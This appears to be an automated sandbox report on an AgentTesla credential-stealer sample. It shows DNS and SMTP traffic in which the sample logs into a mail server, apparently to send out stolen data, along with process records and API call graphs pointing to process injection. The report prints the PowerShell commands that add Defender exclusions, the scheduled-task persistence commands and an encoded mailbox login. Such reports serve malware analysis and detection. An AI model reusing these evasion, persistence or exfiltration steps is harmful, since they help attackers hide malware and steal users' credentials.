Jul 25, 2024 23:37:08.603815079 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 23:35:23.504205942 CEST | 60082 | 53 | 192.168.2.4 | 1.1.1.1
Jul 25, 2024 23:35:23.823698997 CEST | 53 | 60082 | 1.1.1.1 | 192.168.2.4
Jul 25, 2024 23:35:50.618299961 CEST | 53 | 64188 | 162.159.36.2 | 192.168.2.4
Jul 25, 2024 23:35:51.108766079 CEST | 58740 | 53 | 192.168.2.4 | 1.1.1.1
Jul 25, 2024 23:35:51.116590023 CEST | 53 | 58740 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 23:35:23.504205942 CEST | 192.168.2.4 | 1.1.1.1 | 0xae7 | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 23:35:51.108766079 CEST | 192.168.2.4 | 1.1.1.1 | 0x6928 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 23:35:23.823698997 CEST | 1.1.1.1 | 192.168.2.4 | 0xae7 | No error (0) | mail.mbarieservicesltd.com | - | 199.79.62.115 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 23:35:51.116590023 CEST | 1.1.1.1 | 192.168.2.4 | 0x6928 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jul 25, 2024 23:35:24.793643951 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:24 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Jul 25, 2024 23:35:24.794495106 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:24 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Jul 25, 2024 23:35:24.794698000 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | EHLO 226546
Jul 25, 2024 23:35:24.949985027 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 250-md-54.webhostbox.net Hello 226546 [8.46.123.33]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Jul 25, 2024 23:35:24.950963974 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
Jul 25, 2024 23:35:25.107184887 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jul 25, 2024 23:35:25.390507936 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 235 Authentication succeeded
Jul 25, 2024 23:35:25.405983925 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
Jul 25, 2024 23:35:25.560883045 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 250 OK
Jul 25, 2024 23:35:25.563057899 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
Jul 25, 2024 23:35:25.735280037 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 250 Accepted
Jul 25, 2024 23:35:25.740468979 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | DATA
Jul 25, 2024 23:35:25.903961897 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Jul 25, 2024 23:35:25.918808937 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | .
Jul 25, 2024 23:35:26.176848888 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 250 OK id=1sX67R-003JwV-2e
Jul 25, 2024 23:35:28.767617941 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:28 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Jul 25, 2024 23:35:28.768058062 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | EHLO 226546
Jul 25, 2024 23:35:28.989729881 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 250-md-54.webhostbox.net Hello 226546 [8.46.123.33]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Jul 25, 2024 23:35:29.050421000 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
Jul 25, 2024 23:35:29.211951971 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jul 25, 2024 23:35:29.386955023 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 235 Authentication succeeded
Jul 25, 2024 23:35:29.437552929 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
Jul 25, 2024 23:35:29.599245071 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 250 OK
Jul 25, 2024 23:35:29.600358963 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
Jul 25, 2024 23:35:29.816788912 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 250 Accepted
Jul 25, 2024 23:35:29.819538116 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | DATA
Jul 25, 2024 23:35:29.981301069 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Jul 25, 2024 23:35:29.982223034 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | .
Jul 25, 2024 23:35:30.144319057 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 250 OK id=1sX67V-003Jyu-2t
Jul 25, 2024 23:35:30.365951061 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 250 OK id=1sX67V-003Jyu-2t
Jul 25, 2024 23:37:03.532053947 CEST | 49735 | 587 | 192.168.2.4 | 199.79.62.115 | QUIT
Jul 25, 2024 23:37:03.890084028 CEST | 587 | 49735 | 199.79.62.115 | 192.168.2.4 | 221 md-54.webhostbox.net closing connection
Jul 25, 2024 23:37:08.235577106 CEST | 49736 | 587 | 192.168.2.4 | 199.79.62.115 | QUIT
Jul 25, 2024 23:37:08.598304033 CEST | 587 | 49736 | 199.79.62.115 | 192.168.2.4 | 221 md-54.webhostbox.net closing connection

Target ID: 0
Start time: 17:35:15
Start date: 25/07/2024
Path: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Imagebase: 0xb30000
File size: 685'063 bytes
MD5 hash: 2C10CB6C2E23B7712EBF4042D669CD09
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 17:35:18
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Imagebase: 0xe20000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 17:35:18
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 17:35:18
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
Imagebase: 0xe20000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 17:35:18
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 17:35:18
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
Imagebase: 0x6a0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:35:19
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 17:35:19
Start date: 25/07/2024
Path: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
Imagebase: 0x2b0000
File size: 685'063 bytes
MD5 hash: 2C10CB6C2E23B7712EBF4042D669CD09
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 9
Start time: 17:35:19
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                                                Imagebase:0xa40000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:10
                                                Start time:17:35:20
                                                Start date:25/07/2024
                                                Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Imagebase:0xdf0000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                Reputation:low
                                                Has exited:true

                                                Target ID:11
                                                Start time:17:35:23
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff693ab0000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                                                Imagebase:0x6a0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                                                Imagebase:0x60000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:15
                                                Start time:17:35:26
                                                Start date:25/07/2024
                                                Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                                                Imagebase:0x820000
                                                File size:685'063 bytes
                                                MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:9.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:256
                                                  Total number of Limit Nodes:9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48e6110a32434844550d667a9803bd9e255ca13e04d246cea94aa12aad95757f
                                                  • Instruction ID: 5ce62ebbd250417d825a4a8c47bacbfa19220270bf2d970358d563502d29e524
                                                  • Opcode Fuzzy Hash: 48e6110a32434844550d667a9803bd9e255ca13e04d246cea94aa12aad95757f
                                                  • Instruction Fuzzy Hash: 28D0C9B094C118DBDB10FF049460EF8F3FAA70B310F5465E1D16EA6541C270DE844F18

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 527 130d0b3-130d147 GetCurrentProcess 531 130d150-130d184 GetCurrentThread 527->531 532 130d149-130d14f 527->532 533 130d186-130d18c 531->533 534 130d18d-130d1c1 GetCurrentProcess 531->534 532->531 533->534 535 130d1c3-130d1c9 534->535 536 130d1ca-130d1e5 call 130d293 534->536 535->536 540 130d1eb-130d21a GetCurrentThreadId 536->540 541 130d223-130d285 540->541 542 130d21c-130d222 540->542 542->541
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D136
                                                  • GetCurrentThread.KERNEL32 ref: 0130D173
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 0130D209
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: f78d829c8d6f8b5246214710ba27191d91428b34f11f298300caf5edf4d36ac1
                                                  • Instruction ID: 7a9cf7baba3b4876da7e5cffdf4fbe50304b1c0e3cebeb8e9c05d12adcaf437d
                                                  • Opcode Fuzzy Hash: f78d829c8d6f8b5246214710ba27191d91428b34f11f298300caf5edf4d36ac1
                                                  • Instruction Fuzzy Hash: 125155B0900349CFDB58CFAAD548BEEBBF1AF48314F208459D459A73A0CB749884CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 549 130d0b8-130d147 GetCurrentProcess 553 130d150-130d184 GetCurrentThread 549->553 554 130d149-130d14f 549->554 555 130d186-130d18c 553->555 556 130d18d-130d1c1 GetCurrentProcess 553->556 554->553 555->556 557 130d1c3-130d1c9 556->557 558 130d1ca-130d1e5 call 130d293 556->558 557->558 562 130d1eb-130d21a GetCurrentThreadId 558->562 563 130d223-130d285 562->563 564 130d21c-130d222 562->564 564->563
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D136
                                                  • GetCurrentThread.KERNEL32 ref: 0130D173
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 0130D209
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: d0528adc44851d08a2ad01de30ae2c0e89f0350f4251571009b0808e4a59658b
                                                  • Instruction ID: e360562e3a3818fa14785d23cf20b638fed5b55b0ccacf69b60805b4f7ade4c7
                                                  • Opcode Fuzzy Hash: d0528adc44851d08a2ad01de30ae2c0e89f0350f4251571009b0808e4a59658b
                                                  • Instruction Fuzzy Hash: 7A5145B0900319CFDB58DFAAD548BEEBBF1AF48314F208459E419A73A0DB749984CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 641 5a896cc-5a8976d 644 5a8976f-5a89779 641->644 645 5a897a6-5a897c6 641->645 644->645 646 5a8977b-5a8977d 644->646 652 5a897c8-5a897d2 645->652 653 5a897ff-5a8982e 645->653 647 5a8977f-5a89789 646->647 648 5a897a0-5a897a3 646->648 650 5a8978b 647->650 651 5a8978d-5a8979c 647->651 648->645 650->651 651->651 654 5a8979e 651->654 652->653 655 5a897d4-5a897d6 652->655 661 5a89830-5a8983a 653->661 662 5a89867-5a89921 CreateProcessA 653->662 654->648 657 5a897d8-5a897e2 655->657 658 5a897f9-5a897fc 655->658 659 5a897e4 657->659 660 5a897e6-5a897f5 657->660 658->653 659->660 660->660 663 5a897f7 660->663 661->662 664 5a8983c-5a8983e 661->664 673 5a8992a-5a899b0 662->673 674 5a89923-5a89929 662->674 663->658 666 5a89840-5a8984a 664->666 667 5a89861-5a89864 664->667 668 5a8984c 666->668 669 5a8984e-5a8985d 666->669 667->662 668->669 669->669 671 5a8985f 669->671 671->667 684 5a899c0-5a899c4 673->684 685 5a899b2-5a899b6 673->685 674->673 687 5a899d4-5a899d8 684->687 688 5a899c6-5a899ca 684->688 685->684 686 5a899b8 685->686 686->684 689 5a899e8-5a899ec 687->689 690 5a899da-5a899de 687->690 688->687 691 5a899cc 688->691 693 5a899fe-5a89a05 689->693 694 5a899ee-5a899f4 689->694 690->689 692 5a899e0 690->692 691->687 692->689 695 5a89a1c 693->695 696 5a89a07-5a89a16 693->696 694->693 698 5a89a1d 695->698 696->695 698->698
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05A8990E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: adeebc67c58459e48b5a2272eb268e6500e92d0cbf0877274e673fd30c88d670
                                                  • Instruction ID: 4986e7791e97143086d5f8493f951b430a6538db831ac6a8fa3430e4952d5615
                                                  • Opcode Fuzzy Hash: adeebc67c58459e48b5a2272eb268e6500e92d0cbf0877274e673fd30c88d670
                                                  • Instruction Fuzzy Hash: EAA17A71D00619DFDF10DFA9C841BEEBBB2BF48314F0481A9E859A7290DB749985CF92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 699 5a896d8-5a8976d 701 5a8976f-5a89779 699->701 702 5a897a6-5a897c6 699->702 701->702 703 5a8977b-5a8977d 701->703 709 5a897c8-5a897d2 702->709 710 5a897ff-5a8982e 702->710 704 5a8977f-5a89789 703->704 705 5a897a0-5a897a3 703->705 707 5a8978b 704->707 708 5a8978d-5a8979c 704->708 705->702 707->708 708->708 711 5a8979e 708->711 709->710 712 5a897d4-5a897d6 709->712 718 5a89830-5a8983a 710->718 719 5a89867-5a89921 CreateProcessA 710->719 711->705 714 5a897d8-5a897e2 712->714 715 5a897f9-5a897fc 712->715 716 5a897e4 714->716 717 5a897e6-5a897f5 714->717 715->710 716->717 717->717 720 5a897f7 717->720 718->719 721 5a8983c-5a8983e 718->721 730 5a8992a-5a899b0 719->730 731 5a89923-5a89929 719->731 720->715 723 5a89840-5a8984a 721->723 724 5a89861-5a89864 721->724 725 5a8984c 723->725 726 5a8984e-5a8985d 723->726 724->719 725->726 726->726 728 5a8985f 726->728 728->724 741 5a899c0-5a899c4 730->741 742 5a899b2-5a899b6 730->742 731->730 744 5a899d4-5a899d8 741->744 745 5a899c6-5a899ca 741->745 742->741 743 5a899b8 742->743 743->741 746 5a899e8-5a899ec 744->746 747 5a899da-5a899de 744->747 745->744 748 5a899cc 745->748 750 5a899fe-5a89a05 746->750 751 5a899ee-5a899f4 746->751 747->746 749 5a899e0 747->749 748->744 749->746 752 5a89a1c 750->752 753 5a89a07-5a89a16 750->753 751->750 755 5a89a1d 752->755 753->752 755->755
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05A8990E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 411b636ce1c88954b69fdddba09d4880bc030a4f65958c88c3705bfbe278c332
                                                  • Instruction ID: ce266d3b1fc63fe23108fccce0dd5748f1c9493b87dab75dccc949e66b34692e
                                                  • Opcode Fuzzy Hash: 411b636ce1c88954b69fdddba09d4880bc030a4f65958c88c3705bfbe278c332
                                                  • Instruction Fuzzy Hash: D8917A71D002199FDF10DFA9C841BEEBBB2BF48314F0481A9E859A7250DB749985CF92

                                                  Control-flow Graph: CreateActCtxA (rendered graph not reproduced)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 2c9f26929b75102d2e258d898c043b5526bd85056ad0ded272451ad58d68cd4f
                                                  • Instruction ID: 31b1229c65bd524f68d1da41fbfc3bd156715e17d3cda009add4849252f9446a
                                                  • Opcode Fuzzy Hash: 2c9f26929b75102d2e258d898c043b5526bd85056ad0ded272451ad58d68cd4f
                                                  • Instruction Fuzzy Hash: FA41C1B1C0071DCADB25CFAAC844B9EBBF5BF49304F24846AD408AB255DBB56985CF90

                                                  Control-flow Graph: CreateActCtxA (rendered graph not reproduced)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c76fe8c84f89445b5bd48f2a2ec869006a6ca09dc86444e325b788ca1cd9333c
                                                  • Instruction ID: 0a6bd802eff6cc2ba536adad098efd4f9803cdff010363ea0d2105325c989ffc
                                                  • Opcode Fuzzy Hash: c76fe8c84f89445b5bd48f2a2ec869006a6ca09dc86444e325b788ca1cd9333c
                                                  • Instruction Fuzzy Hash: 0841EFB1C00619CEEB25CFAAC8847CDBBF5BF48308F24845AD408AB251DB75598ACF90

                                                  Control-flow Graph: WriteProcessMemory (rendered graph not reproduced)
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05A894E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 47ce26d2871b80651079789521969db4aba42795cdb1c3bca373f0079f68294c
                                                  • Instruction ID: a4f0245872322d2bf37f953b35c08561799e7c8c0c7f92b22b8e10e560653418
                                                  • Opcode Fuzzy Hash: 47ce26d2871b80651079789521969db4aba42795cdb1c3bca373f0079f68294c
                                                  • Instruction Fuzzy Hash: 152128B59003599FCB10DFA9C885BEEBBF5FF48310F108429E959A7350C774A554CBA4

                                                  Control-flow Graph: WriteProcessMemory (rendered graph not reproduced)
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05A894E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
